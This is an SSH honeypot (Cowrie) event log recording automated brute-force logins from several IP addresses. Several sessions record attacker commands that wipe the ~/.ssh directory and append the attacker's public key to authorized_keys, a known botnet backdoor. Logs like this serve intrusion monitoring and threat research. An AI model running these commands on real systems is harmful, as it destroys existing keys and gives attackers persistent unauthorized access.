{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:32:24.946579Z","src_ip":"182.18.161.165","session":"d57d62b9b0bf"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:32:25.940130Z","src_ip":"212.227.235.229","session":"51a8c919f469"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49488,"dst_ip":"1.2.3.4","dst_port":22,"session":"2097f256b827","protocol":"ssh","message":"New connection: 212.227.235.229:49488 (1.2.3.4:22) [session: 2097f256b827]","sensor":"my-vps","timestamp":"2025-09-08T23:32:26.070051Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:32:26.070728Z","src_ip":"212.227.235.229","session":"2097f256b827"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:32:26.201969Z","src_ip":"212.227.235.229","session":"2097f256b827"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:32:26.773420Z","src_ip":"212.227.235.229","session":"2097f256b827"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:32:26.911949Z","src_ip":"212.227.235.229","session":"2097f256b827"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:32:26.913054Z","src_ip":"212.227.235.229","session":"8253e9de5adb"}
{"eventid":"cowrie.session.connect","src_ip":"93.113.63.124","src_port":44316,"dst_ip":"1.2.3.4","dst_port":22,"session":"4028080e478c","protocol":"ssh","message":"New connection: 93.113.63.124:44316 (1.2.3.4:22) [session: 4028080e478c]","sensor":"my-vps","timestamp":"2025-09-08T23:32:35.610225Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:32:35.611025Z","src_ip":"93.113.63.124","session":"4028080e478c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:32:35.669534Z","src_ip":"93.113.63.124","session":"4028080e478c"}
{"eventid":"cowrie.login.success","username":"root","password":"Root123123","message":"login attempt [root/Root123123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:32:36.078618Z","src_ip":"93.113.63.124","session":"4028080e478c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:32:36.219012Z","src_ip":"93.113.63.124","session":"4028080e478c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:32:36.219761Z","src_ip":"93.113.63.124","session":"4028080e478c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:32:36.220935Z","src_ip":"93.113.63.124","session":"4028080e478c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:32:36.391808Z","src_ip":"93.113.63.124","session":"4028080e478c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:32:36.621309Z","src_ip":"93.113.63.124","session":"4028080e478c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:32:36.622030Z","src_ip":"93.113.63.124","session":"4028080e478c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:32:36.683719Z","src_ip":"93.113.63.124","session":"4028080e478c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:32:36.684575Z","src_ip":"93.113.63.124","session":"4028080e478c"}
{"eventid":"cowrie.session.connect","src_ip":"93.113.63.124","src_port":44320,"dst_ip":"1.2.3.4","dst_port":22,"session":"7187ebe7fd7f","protocol":"ssh","message":"New connection: 93.113.63.124:44320 (1.2.3.4:22) [session: 7187ebe7fd7f]","sensor":"my-vps","timestamp":"2025-09-08T23:32:36.742266Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:32:36.743314Z","src_ip":"93.113.63.124","session":"7187ebe7fd7f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:32:36.801818Z","src_ip":"93.113.63.124","session":"7187ebe7fd7f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:32:37.171968Z","src_ip":"93.113.63.124","session":"7187ebe7fd7f"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:32:38.233705Z","src_ip":"93.113.63.124","session":"7187ebe7fd7f"}
{"eventid":"cowrie.session.connect","src_ip":"93.113.63.124","src_port":44330,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb77d55c4fbb","protocol":"ssh","message":"New connection: 93.113.63.124:44330 (1.2.3.4:22) [session: cb77d55c4fbb]","sensor":"my-vps","timestamp":"2025-09-08T23:32:38.315164Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:32:38.315792Z","src_ip":"93.113.63.124","session":"cb77d55c4fbb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:32:38.421703Z","src_ip":"93.113.63.124","session":"cb77d55c4fbb"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:32:38.748883Z","src_ip":"93.113.63.124","session":"cb77d55c4fbb"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:32:38.811683Z","src_ip":"93.113.63.124","session":"4028080e478c"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:32:38.822236Z","src_ip":"93.113.63.124","session":"cb77d55c4fbb"}
{"eventid":"cowrie.session.connect","src_ip":"45.150.34.92","src_port":57312,"dst_ip":"1.2.3.4","dst_port":22,"session":"36f0668bff69","protocol":"ssh","message":"New connection: 45.150.34.92:57312 (1.2.3.4:22) [session: 36f0668bff69]","sensor":"my-vps","timestamp":"2025-09-08T23:32:43.564231Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:32:43.565172Z","src_ip":"45.150.34.92","session":"36f0668bff69"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:32:43.582605Z","src_ip":"45.150.34.92","session":"36f0668bff69"}
{"eventid":"cowrie.login.success","username":"root","password":"admin888","message":"login attempt [root/admin888] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:32:43.692109Z","src_ip":"45.150.34.92","session":"36f0668bff69"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:32:43.747401Z","src_ip":"45.150.34.92","session":"36f0668bff69"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:32:43.748101Z","src_ip":"45.150.34.92","session":"36f0668bff69"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:32:43.749653Z","src_ip":"45.150.34.92","session":"36f0668bff69"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:32:43.769746Z","src_ip":"45.150.34.92","session":"36f0668bff69"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:32:43.905233Z","src_ip":"45.150.34.92","session":"36f0668bff69"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:32:43.905890Z","src_ip":"45.150.34.92","session":"36f0668bff69"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:32:43.925483Z","src_ip":"45.150.34.92","session":"36f0668bff69"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:32:43.926209Z","src_ip":"45.150.34.92","session":"36f0668bff69"}
{"eventid":"cowrie.session.connect","src_ip":"45.150.34.92","src_port":57320,"dst_ip":"1.2.3.4","dst_port":22,"session":"a65b94753f65","protocol":"ssh","message":"New connection: 45.150.34.92:57320 (1.2.3.4:22) [session: a65b94753f65]","sensor":"my-vps","timestamp":"2025-09-08T23:32:43.942251Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:32:43.942780Z","src_ip":"45.150.34.92","session":"a65b94753f65"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:32:43.961103Z","src_ip":"45.150.34.92","session":"a65b94753f65"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:32:44.072037Z","src_ip":"45.150.34.92","session":"a65b94753f65"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:32:45.091850Z","src_ip":"45.150.34.92","session":"a65b94753f65"}
{"eventid":"cowrie.session.connect","src_ip":"45.150.34.92","src_port":57334,"dst_ip":"1.2.3.4","dst_port":22,"session":"db1e2e933fb5","protocol":"ssh","message":"New connection: 45.150.34.92:57334 (1.2.3.4:22) [session: db1e2e933fb5]","sensor":"my-vps","timestamp":"2025-09-08T23:32:45.108588Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:32:45.109316Z","src_ip":"45.150.34.92","session":"db1e2e933fb5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:32:45.126619Z","src_ip":"45.150.34.92","session":"db1e2e933fb5"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:32:45.235591Z","src_ip":"45.150.34.92","session":"db1e2e933fb5"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:32:45.254542Z","src_ip":"45.150.34.92","session":"36f0668bff69"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:32:45.255553Z","src_ip":"45.150.34.92","session":"db1e2e933fb5"}
{"eventid":"cowrie.session.closed","duration":"301.0","message":"Connection lost after 301.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:33:04.235367Z","src_ip":"14.103.117.116","session":"9e204d27a8fb"}
